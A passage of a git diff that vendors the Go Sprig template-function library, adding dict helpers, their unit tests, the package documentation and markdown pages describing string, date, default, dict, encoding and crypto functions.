+ }
+ return res
+}
+
+func omit(dict map[string]interface{}, keys ...string) map[string]interface{} {
+ res := map[string]interface{}{}
+
+ omit := make(map[string]bool, len(keys))
+ for _, k := range keys {
+ omit[k] = true
+ }
+
+ for k, v := range dict {
+ if _, ok := omit[k]; !ok {
+ res[k] = v
+ }
+ }
+ return res
+}
+
+func dict(v ...interface{}) map[string]interface{} {
+ dict := map[string]interface{}{}
+ lenv := len(v)
+ for i := 0; i < lenv; i += 2 {
+ key := strval(v[i])
+ if i+1 >= lenv {
+ dict[key] = ""
+ continue
+ }
+ dict[key] = v[i+1]
+ }
+ return dict
+}
+
+func merge(dst map[string]interface{}, srcs ...map[string]interface{}) interface{} {
+ for _, src := range srcs {
+ if err := mergo.Merge(&dst, src); err != nil {
+ // Swallow errors inside of a template.
+ return ""
+ }
+ }
+ return dst
+}
diff --git a/vendor/github.com/Masterminds/sprig/dict_test.go b/vendor/github.com/Masterminds/sprig/dict_test.go
new file mode 100644
index 0000000000..4ceb40a3db
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/dict_test.go
@@ -0,0 +1,175 @@
+package sprig
+
+import (
+ "strings"
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestDict(t *testing.T) {
+ tpl := `{{$d := dict 1 2 "three" "four" 5}}{{range $k, $v := $d}}{{$k}}{{$v}}{{end}}`
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if len(out) != 12 {
+ t.Errorf("Expected length 12, got %d", len(out))
+ }
+ // dict does not guarantee ordering because it is backed by a map.
+ if !strings.Contains(out, "12") {
+ t.Error("Expected grouping 12")
+ }
+ if !strings.Contains(out, "threefour") {
+ t.Error("Expected grouping threefour")
+ }
+ if !strings.Contains(out, "5") {
+ t.Error("Expected 5")
+ }
+ tpl = `{{$t := dict "I" "shot" "the" "albatross"}}{{$t.the}} {{$t.I}}`
+ if err := runt(tpl, "albatross shot"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestUnset(t *testing.T) {
+ tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+ {{- $_ := unset $d "two" -}}
+ {{- range $k, $v := $d}}{{$k}}{{$v}}{{- end -}}
+ `
+
+ expect := "one1"
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+}
+func TestHasKey(t *testing.T) {
+ tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+ {{- if hasKey $d "one" -}}1{{- end -}}
+ `
+
+ expect := "1"
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestPluck(t *testing.T) {
+ tpl := `
+ {{- $d := dict "one" 1 "two" 222222 -}}
+ {{- $d2 := dict "one" 1 "two" 33333 -}}
+ {{- $d3 := dict "one" 1 -}}
+ {{- $d4 := dict "one" 1 "two" 4444 -}}
+ {{- pluck "two" $d $d2 $d3 $d4 -}}
+ `
+
+ expect := "[222222 33333 4444]"
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestKeys(t *testing.T) {
+ tests := map[string]string{
+ `{{ dict "foo" 1 "bar" 2 | keys | sortAlpha }}`: "[bar foo]",
+ `{{ dict | keys }}`: "[]",
+ `{{ keys (dict "foo" 1) (dict "bar" 2) (dict "bar" 3) | uniq | sortAlpha }}`: "[bar foo]",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+}
+
+func TestPick(t *testing.T) {
+ tests := map[string]string{
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" | len -}}`: "1",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" -}}`: "map[two:222222]",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" | len -}}`: "2",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" "three" | len -}}`: "2",
+ `{{- $d := dict }}{{ pick $d "two" | len -}}`: "0",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+}
+func TestOmit(t *testing.T) {
+ tests := map[string]string{
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" | len -}}`: "1",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" -}}`: "map[two:222222]",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" "two" | len -}}`: "0",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "two" "three" | len -}}`: "1",
+ `{{- $d := dict }}{{ omit $d "two" | len -}}`: "0",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+}
+
+func TestSet(t *testing.T) {
+ tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+ {{- $_ := set $d "two" 2 -}}
+ {{- $_ := set $d "three" 3 -}}
+ {{- if hasKey $d "one" -}}{{$d.one}}{{- end -}}
+ {{- if hasKey $d "two" -}}{{$d.two}}{{- end -}}
+ {{- if hasKey $d "three" -}}{{$d.three}}{{- end -}}
+ `
+
+ expect := "123"
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestMerge(t *testing.T) {
+ dict := map[string]interface{}{
+ "src2": map[string]interface{}{
+ "h": 10,
+ "i": "i",
+ "j": "j",
+ },
+ "src1": map[string]interface{}{
+ "a": 1,
+ "b": 2,
+ "d": map[string]interface{}{
+ "e": "four",
+ },
+ "g": []int{6, 7},
+ "i": "aye",
+ "j": "jay",
+ },
+ "dst": map[string]interface{}{
+ "a": "one",
+ "c": 3,
+ "d": map[string]interface{}{
+ "f": 5,
+ },
+ "g": []int{8, 9},
+ "i": "eye",
+ },
+ }
+ tpl := `{{merge .dst .src1 .src2}}`
+ _, err := runRaw(tpl, dict)
+ if err != nil {
+ t.Error(err)
+ }
+ expected := map[string]interface{}{
+ "a": "one", // key overridden
+ "b": 2, // merged from src1
+ "c": 3, // merged from dst
+ "d": map[string]interface{}{ // deep merge
+ "e": "four",
+ "f": 5,
+ },
+ "g": []int{8, 9}, // overridden - arrays are not merged
+ "h": 10, // merged from src2
+ "i": "eye", // overridden twice
+ "j": "jay", // overridden and merged
+ }
+ assert.Equal(t, expected, dict["dst"])
+}
diff --git a/vendor/github.com/Masterminds/sprig/doc.go b/vendor/github.com/Masterminds/sprig/doc.go
new file mode 100644
index 0000000000..92ea318c7e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/doc.go
@@ -0,0 +1,233 @@
+/*
+Sprig: Template functions for Go.
+
+This package contains a number of utility functions for working with data
+inside of Go `html/template` and `text/template` files.
+
+To add these functions, use the `template.Funcs()` method:
+
+ t := templates.New("foo").Funcs(sprig.FuncMap())
+
+Note that you should add the function map before you parse any template files.
+
+ In several cases, Sprig reverses the order of arguments from the way they
+ appear in the standard library. This is to make it easier to pipe
+ arguments into functions.
+
+Date Functions
+
+ - date FORMAT TIME: Format a date, where a date is an integer type or a time.Time type, and
+ format is a time.Format formatting string.
+ - dateModify: Given a date, modify it with a duration: `date_modify "-1.5h" now`. If the duration doesn't
+ parse, it returns the time unaltered. See `time.ParseDuration` for info on duration strings.
+ - now: Current time.Time, for feeding into date-related functions.
+ - htmlDate TIME: Format a date for use in the value field of an HTML "date" form element.
+ - dateInZone FORMAT TIME TZ: Like date, but takes three arguments: format, timestamp,
+ timezone.
+ - htmlDateInZone TIME TZ: Like htmlDate, but takes two arguments: timestamp,
+ timezone.
+
+String Functions
+
+ - abbrev: Truncate a string with ellipses. `abbrev 5 "hello world"` yields "he..."
+ - abbrevboth: Abbreviate from both sides, yielding "...lo wo..."
+ - trunc: Truncate a string (no suffix). `trunc 5 "Hello World"` yields "hello".
+ - trim: strings.TrimSpace
+ - trimAll: strings.Trim, but with the argument order reversed `trimAll "$" "$5.00"` or `"$5.00 | trimAll "$"`
+ - trimSuffix: strings.TrimSuffix, but with the argument order reversed: `trimSuffix "-" "ends-with-"`
+ - trimPrefix: strings.TrimPrefix, but with the argument order reversed `trimPrefix "$" "$5"`
+ - upper: strings.ToUpper
+ - lower: strings.ToLower
+ - nospace: Remove all space characters from a string. `nospace "h e l l o"` becomes "hello"
+ - title: strings.Title
+ - untitle: Remove title casing
+ - repeat: strings.Repeat, but with the arguments switched: `repeat count str`. (This simplifies common pipelines)
+ - substr: Given string, start, and length, return a substr.
+ - initials: Given a multi-word string, return the initials. `initials "Matt Butcher"` returns "MB"
+ - randAlphaNum: Given a length, generate a random alphanumeric sequence
+ - randAlpha: Given a length, generate an alphabetic string
+ - randAscii: Given a length, generate a random ASCII string (symbols included)
+ - randNumeric: Given a length, generate a string of digits.
+ - swapcase: SwapCase swaps the case of a string using a word based algorithm. see https://godoc.org/github.com/Masterminds/goutils#SwapCase
+ - shuffle: Shuffle randomizes runes in a string and returns the result. It uses default random source in `math/rand`
+ - snakecase: convert all upper case characters in a string to underscore format.
+ - camelcase: convert all lower case characters behind underscores to upper case character
+ - wrap: Force a line wrap at the given width. `wrap 80 "imagine a longer string"`
+ - wrapWith: Wrap a line at the given length, but using 'sep' instead of a newline. `wrapWith 50, "
", $html`
+ - contains: strings.Contains, but with the arguments switched: `contains substr str`. (This simplifies common pipelines)
+ - hasPrefix: strings.hasPrefix, but with the arguments switched
+ - hasSuffix: strings.hasSuffix, but with the arguments switched
+ - quote: Wrap string(s) in double quotation marks, escape the contents by adding '\' before '"'.
+ - squote: Wrap string(s) in double quotation marks, does not escape content.
+ - cat: Concatenate strings, separating them by spaces. `cat $a $b $c`.
+ - indent: Indent a string using space characters. `indent 4 "foo\nbar"` produces " foo\n bar"
+ - nindent: Indent a string using space characters and prepend a new line. `indent 4 "foo\nbar"` produces "\n foo\n bar"
+ - replace: Replace an old with a new in a string: `$name | replace " " "-"`
+ - plural: Choose singular or plural based on length: `len $fish | plural "one anchovy" "many anchovies"`
+ - sha256sum: Generate a hex encoded sha256 hash of the input
+ - toString: Convert something to a string
+
+String Slice Functions:
+
+ - join: strings.Join, but as `join SEP SLICE`
+ - split: strings.Split, but as `split SEP STRING`. The results are returned
+ as a map with the indexes set to _N, where N is an integer starting from 0.
+ Use it like this: `{{$v := "foo/bar/baz" | split "/"}}{{$v._0}}` (Prints `foo`)
+ - splitList: strings.Split, but as `split SEP STRING`. The results are returned
+ as an array.
+ - toStrings: convert a list to a list of strings. 'list 1 2 3 | toStrings' produces '["1" "2" "3"]'
+ - sortAlpha: sort a list lexicographically.
+
+Integer Slice Functions:
+
+ - until: Given an integer, returns a slice of counting integers from 0 to one
+ less than the given integer: `range $i, $e := until 5`
+ - untilStep: Given start, stop, and step, return an integer slice starting at
+ 'start', stopping at `stop`, and incrementing by 'step. This is the same
+ as Python's long-form of 'range'.
+
+Conversions:
+
+ - atoi: Convert a string to an integer. 0 if the integer could not be parsed.
+ - int64: Convert a string or another numeric type to an int64.
+ - int: Convert a string or another numeric type to an int.
+ - float64: Convert a string or another numeric type to a float64.
+
+Defaults:
+
+ - default: Give a default value. Used like this: trim " "| default "empty".
+ Since trim produces an empty string, the default value is returned. For
+ things with a length (strings, slices, maps), len(0) will trigger the default.
+ For numbers, the value 0 will trigger the default. For booleans, false will
+ trigger the default. For structs, the default is never returned (there is
+ no clear empty condition). For everything else, nil value triggers a default.
+ - empty: Return true if the given value is the zero value for its type.
+ Caveats: structs are always non-empty. This should match the behavior of
+ {{if pipeline}}, but can be used inside of a pipeline.
+ - coalesce: Given a list of items, return the first non-empty one.
+ This follows the same rules as 'empty'. '{{ coalesce .someVal 0 "hello" }}`
+ will return `.someVal` if set, or else return "hello". The 0 is skipped
+ because it is an empty value.
+ - compact: Return a copy of a list with all of the empty values removed.
+ 'list 0 1 2 "" | compact' will return '[1 2]'
+ - ternary: Given a value,'true | ternary "b" "c"' will return "b".
+ 'false | ternary "b" "c"' will return '"c"'. Similar to the JavaScript ternary
+ operator.
+
+OS:
+ - env: Resolve an environment variable
+ - expandenv: Expand a string through the environment
+
+File Paths:
+ - base: Return the last element of a path. https://golang.org/pkg/path#Base
+ - dir: Remove the last element of a path. https://golang.org/pkg/path#Dir
+ - clean: Clean a path to the shortest equivalent name. (e.g. remove "foo/.."
+ from "foo/../bar.html") https://golang.org/pkg/path#Clean
+ - ext: https://golang.org/pkg/path#Ext
+ - isAbs: https://golang.org/pkg/path#IsAbs
+
+Encoding:
+ - b64enc: Base 64 encode a string.
+ - b64dec: Base 64 decode a string.
+
+Reflection:
+
+ - typeOf: Takes an interface and returns a string representation of the type.
+ For pointers, this will return a type prefixed with an asterisk(`*`). So
+ a pointer to type `Foo` will be `*Foo`.
+ - typeIs: Compares an interface with a string name, and returns true if they match.
+ Note that a pointer will not match a reference. For example `*Foo` will not
+ match `Foo`.
+ - typeIsLike: Compares an interface with a string name and returns true if
+ the interface is that `name` or that `*name`. In other words, if the given
+ value matches the given type or is a pointer to the given type, this returns
+ true.
+ - kindOf: Takes an interface and returns a string representation of its kind.
+ - kindIs: Returns true if the given string matches the kind of the given interface.
+
+ Note: None of these can test whether or not something implements a given
+ interface, since doing so would require compiling the interface in ahead of
+ time.
+
+Data Structures:
+
+ - tuple: Takes an arbitrary list of items and returns a slice of items. Its
+ tuple-ish properties are mainly gained through the template idiom, and not
+ through an API provided here. WARNING: The implementation of tuple will
+ change in the future.
+ - list: An arbitrary ordered list of items. (This is prefered over tuple.)
+ - dict: Takes a list of name/values and returns a map[string]interface{}.
+ The first parameter is converted to a string and stored as a key, the
+ second parameter is treated as the value. And so on, with odds as keys and
+ evens as values. If the function call ends with an odd, the last key will
+ be assigned the empty string. Non-string keys are converted to strings as
+ follows: []byte are converted, fmt.Stringers will have String() called.
+ errors will have Error() called. All others will be passed through
+ fmt.Sprintf("%v").
+
+Lists Functions:
+
+These are used to manipulate lists: '{{ list 1 2 3 | reverse | first }}'
+
+ - first: Get the first item in a 'list'. 'list 1 2 3 | first' prints '1'
+ - last: Get the last item in a 'list': 'list 1 2 3 | last ' prints '3'
+ - rest: Get all but the first item in a list: 'list 1 2 3 | rest' returns '[2 3]'
+ - initial: Get all but the last item in a list: 'list 1 2 3 | initial' returns '[1 2]'
+ - append: Add an item to the end of a list: 'append $list 4' adds '4' to the end of '$list'
+ - prepend: Add an item to the beginning of a list: 'prepend $list 4' puts 4 at the beginning of the list.
+ - reverse: Reverse the items in a list.
+ - uniq: Remove duplicates from a list.
+ - without: Return a list with the given values removed: 'without (list 1 2 3) 1' would return '[2 3]'
+ - has: Return 'true' if the item is found in the list: 'has "foo" $list' will return 'true' if the list contains "foo"
+
+Dict Functions:
+
+These are used to manipulate dicts.
+
+ - set: Takes a dict, a key, and a value, and sets that key/value pair in
+ the dict. `set $dict $key $value`. For convenience, it returns the dict,
+ even though the dict was modified in place.
+ - unset: Takes a dict and a key, and deletes that key/value pair from the
+ dict. `unset $dict $key`. This returns the dict for convenience.
+ - hasKey: Takes a dict and a key, and returns boolean true if the key is in
+ the dict.
+ - pluck: Given a key and one or more maps, get all of the values for that key.
+ - keys: Get an array of all of the keys in one or more dicts.
+ - pick: Select just the given keys out of the dict, and return a new dict.
+ - omit: Return a dict without the given keys.
+
+Math Functions:
+
+Integer functions will convert integers of any width to `int64`. If a
+string is passed in, functions will attempt to convert with
+`strconv.ParseInt(s, 1064)`. If this fails, the value will be treated as 0.
+
+ - add1: Increment an integer by 1
+ - add: Sum an arbitrary number of integers
+ - sub: Subtract the second integer from the first
+ - div: Divide the first integer by the second
+ - mod: Module of first integer divided by second
+ - mul: Multiply integers
+ - max: Return the biggest of a series of one or more integers
+ - min: Return the smallest of a series of one or more integers
+ - biggest: DEPRECATED. Return the biggest of a series of one or more integers
+
+Crypto Functions:
+
+ - genPrivateKey: Generate a private key for the given cryptosystem. If no
+ argument is supplied, by default it will generate a private key using
+ the RSA algorithm. Accepted values are `rsa`, `dsa`, and `ecdsa`.
+ - derivePassword: Derive a password from the given parameters according to the ["Master Password" algorithm](http://masterpasswordapp.com/algorithm.html)
+ Given parameters (in order) are:
+ `counter` (starting with 1), `password_type` (maximum, long, medium, short, basic, or pin), `password`,
+ `user`, and `site`
+
+SemVer Functions:
+
+These functions provide version parsing and comparisons for SemVer 2 version
+strings.
+
+ - semver: Parse a semantic version and return a Version object.
+ - semverCompare: Compare a SemVer range to a particular version.
+*/
+package sprig
diff --git a/vendor/github.com/Masterminds/sprig/docs/_config.yml b/vendor/github.com/Masterminds/sprig/docs/_config.yml
new file mode 100644
index 0000000000..c741881743
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/_config.yml
@@ -0,0 +1 @@
+theme: jekyll-theme-slate
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/docs/conversion.md b/vendor/github.com/Masterminds/sprig/docs/conversion.md
new file mode 100644
index 0000000000..06f4f77680
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/conversion.md
@@ -0,0 +1,25 @@
+# Type Conversion Functions
+
+The following type conversion functions are provided by Sprig:
+
+- `atoi`: Convert a string to an integer
+- `float64`: Convert to a float64
+- `int`: Convert to an `int` at the system's width.
+- `int64`: Convert to an `int64`
+- `toString`: Convert to a string
+- `toStrings`: Convert a list, slice, or array to a list of strings.
+
+Only `atoi` requires that the input be a specific type. The others will attempt
+to convert from any type to the destination type. For example, `int64` can convert
+floats to ints, and it can also convert strings to ints.
+
+## toStrings
+
+Given a list-like collection, produce a slice of strings.
+
+```
+list 1 2 3 | toStrings
+```
+
+The above converts `1` to `"1"`, `2` to `"2"`, and so on, and then returns
+them as a list.
diff --git a/vendor/github.com/Masterminds/sprig/docs/crypto.md b/vendor/github.com/Masterminds/sprig/docs/crypto.md
new file mode 100644
index 0000000000..a927a45b78
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/crypto.md
@@ -0,0 +1,133 @@
+# Cryptographic and Security Functions
+
+Sprig provides a couple of advanced cryptographic functions.
+
+## sha1sum
+
+The `sha1sum` function receives a string, and computes it's SHA1 digest.
+
+```
+sha1sum "Hello world!"
+```
+
+## sha256sum
+
+The `sha256sum` function receives a string, and computes it's SHA256 digest.
+
+```
+sha256sum "Hello world!"
+```
+
+The above will compute the SHA 256 sum in an "ASCII armored" format that is
+safe to print.
+
+## derivePassword
+
+The `derivePassword` function can be used to derive a specific password based on
+some shared "master password" constraints. The algorithm for this is
+[well specified](http://masterpasswordapp.com/algorithm.html).
+
+```
+derivePassword 1 "long" "password" "user" "example.com"
+```
+
+Note that it is considered insecure to store the parts directly in the template.
+
+## genPrivateKey
+
+The `genPrivateKey` function generates a new private key encoded into a PEM
+block.
+
+It takes one of the values for its first param:
+
+- `ecdsa`: Generate an elyptical curve DSA key (P256)
+- `dsa`: Generate a DSA key (L2048N256)
+- `rsa`: Generate an RSA 4096 key
+
+## buildCustomCert
+
+The `buildCustomCert` function allows customizing the certificate.
+
+It takes the following string parameters:
+
+- A base64 encoded PEM format certificate
+- A base64 encoded PEM format private key
+
+It returns a certificate object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$ca := buildCustomCert "base64-encoded-ca-key" "base64-encoded-ca-crt"
+```
+
+Note that the returned object can be passed to the `genSignedCert` function
+to sign a certificate using this CA.
+
+## genCA
+
+The `genCA` function generates a new, self-signed x509 certificate authority.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Cert validity duration in days
+
+It returns an object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$ca := genCA "foo-ca" 365
+```
+
+Note that the returned object can be passed to the `genSignedCert` function
+to sign a certificate using this CA.
+
+## genSelfSignedCert
+
+The `genSelfSignedCert` function generates a new, self-signed x509 certificate.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Optional list of IPs; may be nil
+- Optional list of alternate DNS names; may be nil
+- Cert validity duration in days
+
+It returns an object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$cert := genSelfSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365
+```
+
+## genSignedCert
+
+The `genSignedCert` function generates a new, x509 certificate signed by the
+specified CA.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Optional list of IPs; may be nil
+- Optional list of alternate DNS names; may be nil
+- Cert validity duration in days
+- CA (see `genCA`)
+
+Example:
+
+```
+$ca := genCA "foo-ca" 365
+$cert := genSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365 $ca
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/date.md b/vendor/github.com/Masterminds/sprig/docs/date.md
new file mode 100644
index 0000000000..9a4f673503
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/date.md
@@ -0,0 +1,88 @@
+# Date Functions
+
+## now
+
+The current date/time. Use this in conjunction with other date functions.
+
+
+## ago
+
+The `ago` function returns duration from time.Now in seconds resolution.
+
+```
+ago .CreatedAt"
+```
+returns in `time.Duration` String() format
+
+```
+2h34m7s
+```
+
+## date
+
+The `date` function formats a date.
+
+
+Format the date to YEAR-MONTH-DAY:
+```
+now | date "2006-01-02"
+```
+
+Date formatting in Go is a [little bit different](https://pauladamsmith.com/blog/2011/05/go_time.html).
+
+In short, take this as the base date:
+
+```
+Mon Jan 2 15:04:05 MST 2006
+```
+
+Write it in the format you want. Above, `2006-01-02` is the same date, but
+in the format we want.
+
+## dateInZone
+
+Same as `date`, but with a timezone.
+
+```
+date "2006-01-02" (now) "UTC"
+```
+
+## dateModify
+
+The `dateModify` takes a modification and a date and returns the timestamp.
+
+Subtract an hour and thirty minutes from the current time:
+
+```
+now | date_modify "-1.5h"
+```
+
+## htmlDate
+
+The `htmlDate` function formates a date for inserting into an HTML date picker
+input field.
+
+```
+now | htmlDate
+```
+
+## htmlDateInZone
+
+Same as htmlDate, but with a timezone.
+
+```
+htmlDate (now) "UTC"
+```
+
+## toDate
+
+`toDate` converts a string to a date. The first argument is the date layout and
+the second the date string. If the string can't be convert it returns the zero
+value.
+
+This is useful when you want to convert a string date to another format
+(using pipe). The example below converts "2017-12-31" to "31/12/2017".
+
+```
+toDate "2006-01-02" "2017-12-31" | date "02/01/2006"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/defaults.md b/vendor/github.com/Masterminds/sprig/docs/defaults.md
new file mode 100644
index 0000000000..c0cae90e53
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/defaults.md
@@ -0,0 +1,113 @@
+# Default Functions
+
+Sprig provides tools for setting default values for templates.
+
+## default
+
+To set a simple default value, use `default`:
+
+```
+default "foo" .Bar
+```
+
+In the above, if `.Bar` evaluates to a non-empty value, it will be used. But if
+it is empty, `foo` will be returned instead.
+
+The definition of "empty" depends on type:
+
+- Numeric: 0
+- String: ""
+- Lists: `[]`
+- Dicts: `{}`
+- Boolean: `false`
+- And always `nil` (aka null)
+
+For structs, there is no definition of empty, so a struct will never return the
+default.
+
+## empty
+
+The `empty` function returns `true` if the given value is considered empty, and
+`false` otherwise. The empty values are listed in the `default` section.
+
+```
+empty .Foo
+```
+
+Note that in Go template conditionals, emptiness is calculated for you. Thus,
+you rarely need `if empty .Foo`. Instead, just use `if .Foo`.
+
+## coalesce
+
+The `coalesce` function takes a list of values and returns the first non-empty
+one.
+
+```
+coalesce 0 1 2
+```
+
+The above returns `1`.
+
+This function is useful for scanning through multiple variables or values:
+
+```
+coalesce .name .parent.name "Matt"
+```
+
+The above will first check to see if `.name` is empty. If it is not, it will return
+that value. If it _is_ empty, `coalesce` will evaluate `.parent.name` for emptiness.
+Finally, if both `.name` and `.parent.name` are empty, it will return `Matt`.
+
+## toJson
+
+The `toJson` function encodes an item into a JSON string.
+
+```
+toJson .Item
+```
+
+The above returns JSON string representation of `.Item`.
+
+## toPrettyJson
+
+The `toPrettyJson` function encodes an item into a pretty (indented) JSON string.
+
+```
+toPrettyJson .Item
+```
+
+The above returns indented JSON string representation of `.Item`.
+
+## ternary
+
+The `ternary` function takes two values, and a test value. If the test value is
+true, the first value will be returned. If the test value is empty, the second
+value will be returned. This is similar to the c ternary operator.
+
+### true test value
+
+```
+ternary "foo" "bar" true
+```
+
+or
+
+```
+true | ternary "foo" "bar"
+```
+
+The above returns `"foo"`.
+
+### false test value
+
+```
+ternary "foo" "bar" false
+```
+
+or
+
+```
+false | ternary "foo" "bar"
+```
+
+The above returns `"bar"`.
diff --git a/vendor/github.com/Masterminds/sprig/docs/dicts.md b/vendor/github.com/Masterminds/sprig/docs/dicts.md
new file mode 100644
index 0000000000..cfd3e27a2a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/dicts.md
@@ -0,0 +1,131 @@
+# Dictionaries and Dict Functions
+
+Sprig provides a key/value storage type called a `dict` (short for "dictionary",
+as in Python). A `dict` is an _unorder_ type.
+
+The key to a dictionary **must be a string**. However, the value can be any
+type, even another `dict` or `list`.
+
+Unlike `list`s, `dict`s are not immutable. The `set` and `unset` functions will
+modify the contents of a dictionary.
+
+## dict
+
+Creating dictionaries is done by calling the `dict` function and passing it a
+list of pairs.
+
+The following creates a dictionary with three items:
+
+```
+$myDict := dict "name1" "value1" "name2" "value2" "name3" "value 3"
+```
+
+## set
+
+Use `set` to add a new key/value pair to a dictionary.
+
+```
+$_ := set $myDict "name4" "value4"
+```
+
+Note that `set` _returns the dictionary_ (a requirement of Go template functions),
+so you may need to trap the value as done above with the `$_` assignment.
+
+## unset
+
+Given a map and a key, delete the key from the map.
+
+```
+$_ := unset $myDict "name4"
+```
+
+As with `set`, this returns the dictionary.
+
+Note that if the key is not found, this operation will simply return. No error
+will be generated.
+
+## hasKey
+
+The `hasKey` function returns `true` if the given dict contains the given key.
+
+```
+hasKey $myDict "name1"
+```
+
+If the key is not found, this returns `false`.
+
+## pluck
+
+The `pluck` function makes it possible to give one key and multiple maps, and
+get a list of all of the matches:
+
+```
+pluck "name1" $myDict $myOtherDict
+```
+
+The above will return a `list` containing every found value (`[value1 otherValue1]`).
+
+If the give key is _not found_ in a map, that map will not have an item in the
+list (and the length of the returned list will be less than the number of dicts
+in the call to `pluck`.
+
+If the key is _found_ but the value is an empty value, that value will be
+inserted.
+
+A common idiom in Sprig templates is to uses `pluck... | first` to get the first
+matching key out of a collection of dictionaries.
+
+## merge
+
+Merge two or more dictionaries into one, giving precedence to the dest dictionary:
+
+```
+$newdict := merge $dest $source1 $source2
+```
+
+This is a deep merge operation.
+
+## keys
+
+The `keys` function will return a `list` of all of the keys in one or more `dict`
+types. Since a dictionary is _unordered_, the keys will not be in a predictable order.
+They can be sorted with `sortAlpha`.
+
+```
+keys $myDict | sortAlpha
+```
+
+When supplying multiple dictionaries, the keys will be concatenated. Use the `uniq`
+function along with `sortAlpha` to get a unqiue, sorted list of keys.
+
+```
+keys $myDict $myOtherDict | uniq | sortAlpha
+```
+
+## pick
+
+The `pick` function selects just the given keys out of a dictionary, creating a
+new `dict`.
+
+```
+$new := pick $myDict "name1" "name3"
+```
+
+The above returns `{name1: value1, name2: value2}`
+
+## omit
+
+The `omit` function is similar to `pick`, except it returns a new `dict` with all
+the keys that _do not_ match the given keys.
+
+```
+$new := omit $myDict "name1" "name3"
+```
+
+The above returns `{name2: value2}`
+
+## A Note on Dict Internals
+
+A `dict` is implemented in Go as a `map[string]interface{}`. Go developers can
+pass `map[string]interface{}` values into the context to make them available
+to templates as `dict`s.
diff --git a/vendor/github.com/Masterminds/sprig/docs/encoding.md b/vendor/github.com/Masterminds/sprig/docs/encoding.md
new file mode 100644
index 0000000000..1c7a36f849
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/encoding.md
@@ -0,0 +1,6 @@
+# Encoding Functions
+
+Sprig has the following encoding and decoding functions:
+
+- `b64enc`/`b64dec`: Encode or decode with Base64
+- `b32enc`/`b32dec`: Encode or decode with Base32
diff --git a/vendor/github.com/Masterminds/sprig/docs/flow_control.md b/vendor/github.com/Masterminds/sprig/docs/flow_control.md
new file mode 100644
index 0000000000..6414640a6a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/flow_control.md
@@ -0,0 +1,11 @@
+# Flow Control Functions
+
+## fail
+
+Unconditionally returns an empty `string` and an `error` with the specified
+text. This is useful in scenarios where other conditionals have determined that
+template rendering should fail.
+
+```
+fail "Please accept the end user license agreement"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/index.md b/vendor/github.com/Masterminds/sprig/docs/index.md
new file mode 100644
index 0000000000..24e17d89cc
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/index.md
@@ -0,0 +1,23 @@
+# Sprig Function Documentation
+
+The Sprig library provides over 70 template functions for Go's template language.
+
+- [String Functions](strings.md): `trim`, `wrap`, `randAlpha`, `plural`, etc.
+ - [String List Functions](string_slice.md): `splitList`, `sortAlpha`, etc.
+- [Math Functions](math.md): `add`, `max`, `mul`, etc.
+ - [Integer Slice Functions](integer_slice.md): `until`, `untilStep`
+- [Date Functions](date.md): `now`, `date`, etc.
+- [Defaults Functions](defaults.md): `default`, `empty`, `coalesce`, `toJson`, `toPrettyJson`
+- [Encoding Functions](encoding.md): `b64enc`, `b64dec`, etc.
+- [Lists and List Functions](lists.md): `list`, `first`, `uniq`, etc.
+- [Dictionaries and Dict Functions](dicts.md): `dict`, `hasKey`, `pluck`, etc.
+- [Type Conversion Functions](conversion.md): `atoi`, `int64`, `toString`, etc.
+- [File Path Functions](paths.md): `base`, `dir`, `ext`, `clean`, `isAbs`
+- [Flow Control Functions](flow_control.md): `fail`
+- Advanced Functions
+ - [UUID Functions](uuid.md): `uuidv4`
